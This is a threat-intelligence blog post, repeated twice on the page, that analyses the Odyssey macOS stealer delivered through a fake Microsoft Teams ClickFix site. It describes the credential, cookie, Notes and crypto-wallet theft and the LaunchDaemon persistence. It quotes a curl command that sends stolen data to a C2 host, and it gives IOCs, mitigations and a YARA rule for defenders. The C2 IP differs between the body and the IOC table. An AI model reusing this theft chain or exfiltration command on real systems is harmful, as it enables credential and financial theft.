🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity

Threat Actors Impersonate Microsoft Teams To Deliver Odyssey macOS Stealer Via Clickfix

Threat actors are exploiting a fake Microsoft Teams download site to deliver the Odyssey macOS stealer via Clickfix. Once executed, the malware harvests credentials, cookies, Apple Notes, and crypto wallets, exfiltrating data to a C2 server before ensuring persistence through LaunchDaemons and even replacing Ledger Live with a trojanized version. The campaign poses severe risks of credential theft, financial loss, and long-term reinfection.

Koushik Pal
September 5, 2025
Green Alert
Last Update posted on
September 5, 2025
Table of Contents
Author(s)
No items found.

Executive Summary

In early August 2025, Forcepoint released a report about a clickfix campaign that impersonated Tradingview to deliver Odyssey stealer. During routine infrastructure discovery, CloudSEK’s TRIAD identified that the threat actors are now luring users via a fake Microsoft Teams download site. When victims copy the provided command, a base64-encoded AppleScript stealer (Odyssey) is executed. The malware harvests credentials, browser cookies, Apple Notes, and multiple desktop/extension-based cryptocurrency wallets, staging data into /tmp/out.zip before exfiltrating it to its C2. It then establishes persistence via LaunchDaemons and replaces Ledger Live with a trojanized version.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites targeting macOS users. One of those websites was found to be impersonating Microsoft, with a “Microsoft Teams” logo on the delivery page. Hunting using FOFA, we found 24 unique IPs belonging to the same cluster.

Landing page - teamsonsoft[.]com

When the victim clicks on “Copy”, a command is copied to the clipboard, depending on the user agent. For windows, it copies the same command shown. For MacOS users, it copies the below:

Clipboard - macOS useragent

The base64 encoded text, decoded below:

Contents of delivery script

1) Execution

  • One-liner launches a large embedded AppleScript with osascript -e 'run script ...'. No exploit, just script execution. (T1059.002) 

2) Discovery

  • Gathers system inventory with system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType; stores it as “hardware” in a temp working dir /tmp/<random>/. (T1082) 

3) Credential Access, Privilege Escalation

  • Checks if it can auth the local user with dscl . authonly. If not, it prompts the user with a fake dialog: “Required Application Helper. Please enter device password to continue.” It loops until the correct password is entered. (T1056.002, T1110) 
  • Tries to pull the Chrome keychain item via security ... find-generic-password -ga "Chrome" and writes a “masterpass-chrome” file. (T1555.001) 
  • Stashes the captured password at ~/.pwd. (T1555, T1078) 

4) Collection

Apple ecosystem

  • Apple Notes database (NoteStore.sqlite, -wal, -shm) + a fallback that talks to the Notes app to export note bodies into HTML; also vacuums Notes attachments from Notes “Media” folders. (T1119, T1113) 
  • Safari artifacts: Cookies.binarycookies, “Form Values”. (T1555.003, T1539) 
  • Login keychain copy: ~/Library/Keychains/<HardwareUUID> and login.keychain-db. (T1555.001) 

Browsers (Chromium family: Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Chromium, etc.)

  • Walks every Default/Profile * profile and copies:
    • Cookies, Web Data, Login Data (saved logins & autofill). (T1555.003)
    • Local Extension Settings/ and IndexedDB/ for a very long allowlist of extension IDs (wallets, password managers, etc.). (T1005) 

Browsers (Gecko family: Firefox, Waterfox)

  • Copies cookies.sqlite, formhistory.sqlite, key4.db, logins.json from each profile. (T1555.003)
  • Specifically hunts MetaMask storage by parsing prefs.js to derive the extension’s storage path, then copies its idb buckets. (T1005) 

Crypto wallets (desktop apps)

  • Recursively copies data for Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Bitcoin Core, Litecoin Core, Dash Core, Electron Cash, Guarda, Dogecoin Core, Trezor Suite, plus Ledger Live. (T1555, T1005) 
  • Also grabs Binance/TonKeeper config paths. 

Grab-bag

  • From Desktop/Documents, quietly copies up to ~10 MB of files with “interesting” extensions: txt,pdf,doc,docx,keys,key,wallet,kdbx,jpg,png,jpeg,rtf. (T1005) 

5) Exfil Preparation

  • Mirrors directory trees but skips noisy caches (GPUCache, Code Cache, Crashpad, Cache, etc.). (T1074)
  • Archives everything to /tmp/out.zip via ditto -c -k. (T1560) 

6) Exfiltration, C2

  • curl -X POST ... --data-binary @/tmp/out.zip http://185.93.89.62/log with headers buildid, username: vipx, repeat: false. Retries on failure. (T1041) 
  • Same host serves secondary payloads at /otherassets/plist and /otherassets/ledger.zip. (T1105) 

7) Persistence, Defense Evasion, C2

  • LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003) 
  • App replacement: kills and replaces Ledger Live.app with a ZIP fetched from the C2, using sudo to remove and unzip into /Applications. (T1036, T1112/T1105) 
  • Cleans up the working dir and /tmp/out.zip after upload. (T1070.004) 

This Odyssey sample runs via osascript, steals keychains, cookies, saved logins, Apple Notes, and dozens of wallet/extension stores, zips everything, ships it to http://185.93.89[.]62/log, then plants persistence (LaunchDaemon) and even replaces Ledger Live with a trojanized copy. The C2 is also hosting the Odyssey stealer login panel.

Indicators of Compromise

IOC Indicator Table
Type Indicator
IP / C2 185.93.89[.]162 (HTTP, /log, /otherassets/plist, /otherassets/ledger.zip)
Delivery Clickfix teamsonsoft[.]com
Hashes (sha256) 9c520fa25239c0f116ce7818949ddce5fd2f315317863715416cb488
6c5aeb2

7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547a
c40d5e1

d81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fb
a5f9ee8

397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc
1516273

909038524250903a44efd734710e60a8f73719130176c726e58d3287b
22067c8
File Artifacts ~/.pwd, ~/.username, ~/.chost, ~/.botid
Persistence /Library/LaunchDaemons/com.<random>.plist (random numeric suffix)
Process/Commands osascript -e run script, dscl . authonly, security ... -ga "Chrome", ditto -c -k, curl -X POST ... --data-binary @/tmp/out.zip, unzip /tmp/ledger.zip
App Tampering Replacement of /Applications/Ledger Live.app with trojanized version

Impact

  • Credential Theft: Browser logins, autofill data, keychains, and crypto wallet credentials stolen.
  • Data Exfiltration: Notes, documents, screenshots, and up to 10MB of personal files exfiltrated.
  • Financial Theft: Direct compromise of crypto wallets (desktop + extension + Ledger Live tampering).
  • Persistence & Re-infection: System-level LaunchDaemon ensures long-term access and reinfection risk.

Mitigations

  • Network Controls: Monitor for unusual curl POSTs with zipped data.
  • Endpoint Hunting: Audit /Library/LaunchDaemons/ for suspicious com.<digits>.plist and recent osascript executions.
  • Credential Hygiene: Reset Apple ID, browser, and wallet passwords; reissue keys from uncompromised systems.
  • Containment & Recovery: Remove trojanized /Applications/Ledger Live.app, wipe temp artifacts, and rebuild infected macOS systems if integrity cannot be guaranteed.

Yara Rule

rule OSX_Odyssey_Osascript_Exec

{

    meta:

        description = "Detects Odyssey stealer AppleScript execution via osascript"

        date = "2025-09-04"

    strings:

        $osascript = "osascript -e 'run script" ascii

        $dscl_auth = "dscl . authonly" ascii

        $security_chrome = "security" ascii wide nocase

        $masterpass = "masterpass-chrome" ascii

    condition:

        all of them

}

References

Predict Cyber threats against your organization

Related Posts
No items found.

Join 10,000+ subscribers

Keep up with the latest news about strains of Malware, Phishing Lures,
Indicators of Compromise, and Data Leaks.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

Table of Content

Executive Summary

In early August 2025, Forcepoint released a report about a clickfix campaign that impersonated Tradingview to deliver Odyssey stealer. During routine infrastructure discovery, CloudSEK’s TRIAD identified that the threat actors are now luring users via a fake Microsoft Teams download site. When victims copy the provided command, a base64-encoded AppleScript stealer (Odyssey) is executed. The malware harvests credentials, browser cookies, Apple Notes, and multiple desktop/extension-based cryptocurrency wallets, staging data into /tmp/out.zip before exfiltrating it to its C2. It then establishes persistence via LaunchDaemons and replaces Ledger Live with a trojanized version.

Analysis 

During the routine attacker infrastructure discovery and attribution cycle, we discovered a number of Clickfix themed delivery websites targeting macOS users. One of those websites was found to be impersonating Microsoft, with a “Microsoft Teams” logo on the delivery page. Hunting using FOFA, we found 24 unique IPs belonging to the same cluster.

Landing page - teamsonsoft[.]com

When the victim clicks on “Copy”, a command is copied to the clipboard, depending on the user agent. For windows, it copies the same command shown. For MacOS users, it copies the below:

Clipboard - macOS useragent

The base64 encoded text, decoded below:

Contents of delivery script

1) Execution

  • One-liner launches a large embedded AppleScript with osascript -e 'run script ...'. No exploit, just script execution. (T1059.002) 

2) Discovery

  • Gathers system inventory with system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType; stores it as “hardware” in a temp working dir /tmp/<random>/. (T1082) 

3) Credential Access, Privilege Escalation

  • Checks if it can auth the local user with dscl . authonly. If not, it prompts the user with a fake dialog: “Required Application Helper. Please enter device password to continue.” It loops until the correct password is entered. (T1056.002, T1110) 
  • Tries to pull the Chrome keychain item via security ... find-generic-password -ga "Chrome" and writes a “masterpass-chrome” file. (T1555.001) 
  • Stashes the captured password at ~/.pwd. (T1555, T1078) 

4) Collection

Apple ecosystem

  • Apple Notes database (NoteStore.sqlite, -wal, -shm) + a fallback that talks to the Notes app to export note bodies into HTML; also vacuums Notes attachments from Notes “Media” folders. (T1119, T1113) 
  • Safari artifacts: Cookies.binarycookies, “Form Values”. (T1555.003, T1539) 
  • Login keychain copy: ~/Library/Keychains/<HardwareUUID> and login.keychain-db. (T1555.001) 

Browsers (Chromium family: Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Chromium, etc.)

  • Walks every Default/Profile * profile and copies:
    • Cookies, Web Data, Login Data (saved logins & autofill). (T1555.003)
    • Local Extension Settings/ and IndexedDB/ for a very long allowlist of extension IDs (wallets, password managers, etc.). (T1005) 

Browsers (Gecko family: Firefox, Waterfox)

  • Copies cookies.sqlite, formhistory.sqlite, key4.db, logins.json from each profile. (T1555.003)
  • Specifically hunts MetaMask storage by parsing prefs.js to derive the extension’s storage path, then copies its idb buckets. (T1005) 

Crypto wallets (desktop apps)

  • Recursively copies data for Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Bitcoin Core, Litecoin Core, Dash Core, Electron Cash, Guarda, Dogecoin Core, Trezor Suite, plus Ledger Live. (T1555, T1005) 
  • Also grabs Binance/TonKeeper config paths. 

Grab-bag

  • From Desktop/Documents, quietly copies up to ~10 MB of files with “interesting” extensions: txt,pdf,doc,docx,keys,key,wallet,kdbx,jpg,png,jpeg,rtf. (T1005) 

5) Exfil Preparation

  • Mirrors directory trees but skips noisy caches (GPUCache, Code Cache, Crashpad, Cache, etc.). (T1074)
  • Archives everything to /tmp/out.zip via ditto -c -k. (T1560) 

6) Exfiltration, C2

  • curl -X POST ... --data-binary @/tmp/out.zip http://185.93.89.62/log with headers buildid, username: vipx, repeat: false. Retries on failure. (T1041) 
  • Same host serves secondary payloads at /otherassets/plist and /otherassets/ledger.zip. (T1105) 

7) Persistence, Defense Evasion, C2

  • LaunchDaemon persistence: downloads a shell command string, wraps it in a random-named com.<random>.plist, installs to /Library/LaunchDaemons/, launchctl bootstrap system ...; falls back to nohup run if bootstrap fails. Requires sudo, hence the password prompt earlier. (T1543.004, T1053.003) 
  • App replacement: kills and replaces Ledger Live.app with a ZIP fetched from the C2, using sudo to remove and unzip into /Applications. (T1036, T1112/T1105) 
  • Cleans up the working dir and /tmp/out.zip after upload. (T1070.004) 

This Odyssey sample runs via osascript, steals keychains, cookies, saved logins, Apple Notes, and dozens of wallet/extension stores, zips everything, ships it to http://185.93.89[.]62/log, then plants persistence (LaunchDaemon) and even replaces Ledger Live with a trojanized copy. The C2 is also hosting the Odyssey stealer login panel.

Indicators of Compromise

IOC Indicator Table
Type Indicator
IP / C2 185.93.89[.]162 (HTTP, /log, /otherassets/plist, /otherassets/ledger.zip)
Delivery Clickfix teamsonsoft[.]com
Hashes (sha256) 9c520fa25239c0f116ce7818949ddce5fd2f315317863715416cb488
6c5aeb2

7a8250904e6f079e1a952b87e55dc87e467cc560a2694a142f2d6547a
c40d5e1

d81cc9380673cb36a30f2a84ef155b0cbc7958daa6870096e455044fb
a5f9ee8

397ee604eb5e20905605c9418838aadccbbbfe6a15fc9146442333cfc
1516273

909038524250903a44efd734710e60a8f73719130176c726e58d3287b
22067c8
File Artifacts ~/.pwd, ~/.username, ~/.chost, ~/.botid
Persistence /Library/LaunchDaemons/com.<random>.plist (random numeric suffix)
Process/Commands osascript -e run script, dscl . authonly, security ... -ga "Chrome", ditto -c -k, curl -X POST ... --data-binary @/tmp/out.zip, unzip /tmp/ledger.zip
App Tampering Replacement of /Applications/Ledger Live.app with trojanized version

Impact

  • Credential Theft: Browser logins, autofill data, keychains, and crypto wallet credentials stolen.
  • Data Exfiltration: Notes, documents, screenshots, and up to 10MB of personal files exfiltrated.
  • Financial Theft: Direct compromise of crypto wallets (desktop + extension + Ledger Live tampering).
  • Persistence & Re-infection: System-level LaunchDaemon ensures long-term access and reinfection risk.

Mitigations

  • Network Controls: Monitor for unusual curl POSTs with zipped data.
  • Endpoint Hunting: Audit /Library/LaunchDaemons/ for suspicious com.<digits>.plist and recent osascript executions.
  • Credential Hygiene: Reset Apple ID, browser, and wallet passwords; reissue keys from uncompromised systems.
  • Containment & Recovery: Remove trojanized /Applications/Ledger Live.app, wipe temp artifacts, and rebuild infected macOS systems if integrity cannot be guaranteed.

Yara Rule

rule OSX_Odyssey_Osascript_Exec

{

    meta:

        description = "Detects Odyssey stealer AppleScript execution via osascript"

        date = "2025-09-04"

    strings:

        $osascript = "osascript -e 'run script" ascii

        $dscl_auth = "dscl . authonly" ascii

        $security_chrome = "security" ascii wide nocase

        $masterpass = "masterpass-chrome" ascii

    condition:

        all of them

}

References

Koushik Pal

Related Blogs